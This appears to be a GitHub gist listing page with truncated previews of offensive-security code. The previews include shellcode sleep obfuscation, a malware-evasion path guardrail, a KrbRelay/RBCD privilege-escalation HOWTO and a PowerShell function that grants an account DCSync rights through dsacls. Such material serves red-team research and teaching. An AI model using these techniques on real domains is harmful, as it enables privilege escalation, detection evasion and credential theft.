klezVirus
@tin-z
tin-z / VR_roadmap.md
Last active July 22, 2024 03:05
Becoming a Vulnerability Researcher roadmap: my personal experience
@mistymntncop
mistymntncop / demo.c
Last active April 17, 2024 16:09
NtWaitForDebugEvent + WaitForMultipleObjects
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }
@WKL-Sec
WKL-Sec / FolderPathVerificationSample.cpp
Created February 5, 2024 15:33
Folder Path Verification C++ Sample: A concise C++ example demonstrating how to verify an application's execution path against a specified directory.
// White Knight Labs - Offensive Development Course
// Guardrails - Folder Check
#include <windows.h> // Include Windows-specific headers for system calls
#include <iostream> // Include for input and output stream operations
#include <string> // Include for using string class
#include <algorithm> // Include for standard algorithms, e.g., std::transform
#include <cctype> // Include for character handling functions, e.g., std::tolower
// Function to check if the path of the current executable is under a specified path
@Huntinex
Huntinex / report.py
Last active March 8, 2024 12:53
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
    more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@susMdT
susMdT / shitcode.c
Last active March 26, 2024 12:40
hahaha da shellcode go brrrr
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
@tothi
tothi / krbrelay_privesc_howto.md
Last active March 1, 2024 12:26
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@jfmaes
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory=$True)]
        [string]$AccountName
    )
    $dse = [ADSI]"LDAP://Rootdse"
    $namingcontext = $dse.defaultNamingContext
    echo "Giving $AccountName DCSync rights"
    dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
#include <ntddk.h>
#define BLOCK_PROCESS "notepad.exe"
static OB_CALLBACK_REGISTRATION obcallback_registration;
static OB_OPERATION_REGISTRATION oboperation_callback;
#define PROCESS_CREATE_THREAD (0x0002)
#define PROCESS_CREATE_PROCESS (0x0080)
#define PROCESS_TERMINATE (0x0001)
#define PROCESS_VM_WRITE (0x0020)
#define PROCESS_VM_READ (0x0010)
#define PROCESS_VM_OPERATION (0x0008)
@renniepak
renniepak / fingerprint.js
Created December 2, 2021 12:30
Script to fingerprint Script Gadgets to use to exploit Prototype Pollution. Updated version. Original Creator: Nikita Stupin @_nikitastupin
(() => {
    let gadgets = [];
    if (typeof _satellite !== 'undefined') {
        gadgets.push('Adobe Dynamic Tag Management');
    }
    if (typeof BOOMR !== 'undefined') {
        gadgets.push('Akamai Boomerang');
    }